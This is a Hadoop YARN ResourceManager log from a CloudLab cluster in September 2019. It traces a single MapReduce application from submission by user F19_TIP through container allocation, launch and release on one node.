2019-09-23 15:17:59,959 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Starting expired delegation token remover thread, tokenRemoverScanInterval=60 min(s)
2019-09-23 15:17:59,959 INFO org.apache.hadoop.security.token.delegation.AbstractDelegationTokenSecretManager: Updating the current master key for generating delegation tokens
2019-09-23 15:18:00,878 INFO org.mortbay.log: Started HttpServer2$SelectChannelConnectorWithSafeStartup@master_hostname:8088
2019-09-23 15:18:00,878 INFO org.apache.hadoop.yarn.webapp.WebApps: Web app cluster started at 8088
2019-09-23 15:18:00,905 INFO org.apache.hadoop.ipc.CallQueueManager: Using callQueue class java.util.concurrent.LinkedBlockingQueue
2019-09-23 15:18:00,906 INFO org.apache.hadoop.ipc.Server: Starting Socket Reader #1 for port 8033
2019-09-23 15:18:00,908 INFO org.apache.hadoop.yarn.factories.impl.pb.RpcServerFactoryPBImpl: Adding protocol org.apache.hadoop.yarn.server.api.ResourceManagerAdministrationProtocolPB to the server
2019-09-23 15:18:00,910 INFO org.apache.hadoop.ipc.Server: IPC Server Responder: starting
2019-09-23 15:18:00,910 INFO org.apache.hadoop.ipc.Server: IPC Server listener on 8033: starting
2019-09-23 15:18:01,715 INFO org.apache.hadoop.yarn.util.RackResolver: Resolved cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us to /default-rack
2019-09-23 15:18:01,718 INFO org.apache.hadoop.yarn.server.resourcemanager.ResourceTrackerService: NodeManager from node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us(cmPort: 40315 httpPort: 8042) registered with capability: <memory:65536, vCores:32>, assigned nodeId cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315
2019-09-23 15:18:01,721 INFO org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeImpl: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 Node Transitioned from NEW to RUNNING
2019-09-23 15:18:01,728 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added node cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 cluster capacity: <memory:65536, vCores:32>
2019-09-23 15:20:48,991 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Allocated new applicationId: 1
2019-09-23 15:20:49,597 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Application with id 1 submitted by user F19_TIP
2019-09-23 15:20:49,599 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Storing application with id application_1569273478927_0001
2019-09-23 15:20:49,600 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.96	OPERATION=Submit Application Request	TARGET=ClientRMService	RESULT=SUCCESS	APPID=application_1569273478927_0001
2019-09-23 15:20:49,609 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0001 State change from NEW to NEW_SAVING
2019-09-23 15:20:49,610 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing info for app: application_1569273478927_0001
2019-09-23 15:20:49,611 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0001 State change from NEW_SAVING to SUBMITTED
2019-09-23 15:20:49,621 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Accepted application application_1569273478927_0001 from user: F19_TIP, in queue: default, currently num of applications: 1
2019-09-23 15:20:49,643 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0001 State change from SUBMITTED to ACCEPTED
2019-09-23 15:20:49,676 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569273478927_0001_000001
2019-09-23 15:20:49,677 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from NEW to SUBMITTED
2019-09-23 15:20:49,696 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569273478927_0001_000001 to scheduler from user: F19_TIP
2019-09-23 15:20:49,700 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from SUBMITTED to SCHEDULED
2019-09-23 15:20:50,332 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:20:50,332 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000001
2019-09-23 15:20:50,333 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available after allocation
2019-09-23 15:20:50,414 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 for container : container_1569273478927_0001_01_000001
2019-09-23 15:20:50,426 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:20:50,427 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569273478927_0001_000001
2019-09-23 15:20:50,430 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569273478927_0001 AttemptId: appattempt_1569273478927_0001_000001 MasterContainer: Container: [ContainerId: container_1569273478927_0001_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:40315 }, ]
2019-09-23 15:20:50,443 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 15:20:50,444 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 15:20:50,447 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569273478927_0001_000001
2019-09-23 15:20:50,486 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569273478927_0001_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:40315 }, ] for AM appattempt_1569273478927_0001_000001
2019-09-23 15:20:50,486 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569273478927_0001_01_000001 : $JAVA_HOME/bin/java -Djava.io.tmpdir=$PWD/tmp -Dlog4j.configuration=container-log4j.properties -Dyarn.app.container.log.dir=<LOG_DIR> -Dyarn.app.container.log.filesize=0 -Dhadoop.root.logger=INFO,CLA -Dhadoop.root.logfile=syslog  -Xmx1024m org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1><LOG_DIR>/stdout 2><LOG_DIR>/stderr 
2019-09-23 15:20:50,489 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569273478927_0001_000001
2019-09-23 15:20:50,494 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569273478927_0001_000001
2019-09-23 15:20:50,835 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569273478927_0001_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:40315 }, ] for AM appattempt_1569273478927_0001_000001
2019-09-23 15:20:50,836 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from ALLOCATED to LAUNCHED
2019-09-23 15:20:51,329 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000001 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:20:55,398 INFO SecurityLogger.org.apache.hadoop.ipc.Server: Auth successful for appattempt_1569273478927_0001_000001 (auth:SIMPLE)
2019-09-23 15:20:55,412 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: AM registration appattempt_1569273478927_0001_000001
2019-09-23 15:20:55,412 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=Register App Master	TARGET=ApplicationMasterService	RESULT=SUCCESS	APPID=application_1569273478927_0001	APPATTEMPTID=appattempt_1569273478927_0001_000001
2019-09-23 15:20:55,413 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from LAUNCHED to RUNNING
2019-09-23 15:20:55,413 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0001 State change from ACCEPTED to RUNNING
2019-09-23 15:20:57,346 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000002 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:20:57,347 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000002
2019-09-23 15:20:57,347 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available after allocation
2019-09-23 15:20:57,517 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 for container : container_1569273478927_0001_01_000002
2019-09-23 15:20:57,519 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000002 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:20:58,348 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000002 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:20:58,349 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000003 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:20:58,349 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000003
2019-09-23 15:20:58,349 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available after allocation
2019-09-23 15:20:58,545 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000003 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:20:59,350 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000003 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:20:59,352 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000004 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:20:59,352 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000004
2019-09-23 15:20:59,352 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available after allocation
2019-09-23 15:20:59,556 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000004 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:00,165 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000004 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:00,167 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000005 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:00,168 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000005
2019-09-23 15:21:00,168 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available after allocation
2019-09-23 15:21:00,570 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000005 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:01,169 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000005 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:01,171 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000002 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:01,171 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000002 in state: COMPLETED event:FINISHED
2019-09-23 15:21:01,171 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000002
2019-09-23 15:21:01,171 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available, release resources=true
2019-09-23 15:21:01,172 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000002 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=4 available=<memory:60416, vCores:28> used=<memory:5120, vCores:4> with event: FINISHED
2019-09-23 15:21:01,174 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000006 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:01,175 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000006
2019-09-23 15:21:01,175 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available after allocation
2019-09-23 15:21:01,188 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000007 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:01,188 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000007
2019-09-23 15:21:01,188 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 15:21:01,579 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000006 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:01,582 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000007 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:02,191 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000006 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:02,192 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000007 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:02,193 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000003 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:02,193 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000003 in state: COMPLETED event:FINISHED
2019-09-23 15:21:02,193 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000003
2019-09-23 15:21:02,193 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 15:21:02,193 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000003 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 15:21:02,194 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000008 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:02,194 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000008
2019-09-23 15:21:02,194 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 15:21:02,330 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000009 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:02,330 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000009
2019-09-23 15:21:02,330 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 15:21:02,608 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000008 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:02,610 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000009 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:03,332 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000008 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:03,333 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000009 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:03,334 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000004 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:03,334 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000004 in state: COMPLETED event:FINISHED
2019-09-23 15:21:03,334 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000004
2019-09-23 15:21:03,335 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 15:21:03,335 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000004 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 15:21:03,337 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000010 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:03,337 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000010
2019-09-23 15:21:03,338 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 15:21:03,480 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000011 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:03,480 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000011
2019-09-23 15:21:03,480 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 15:21:03,616 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569273478927_0001
2019-09-23 15:21:03,619 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000010 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:03,621 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000011 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:04,487 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000010 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:04,488 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000011 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:04,489 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000005 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:04,489 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000005 in state: COMPLETED event:FINISHED
2019-09-23 15:21:04,489 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000005
2019-09-23 15:21:04,489 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
2019-09-23 15:21:04,489 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000005 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: FINISHED
2019-09-23 15:21:04,491 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000012 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:04,491 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000012
2019-09-23 15:21:04,491 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000012 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 15:21:04,630 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000012 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:04,686 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000012 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:04,687 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000013 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:04,687 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000013
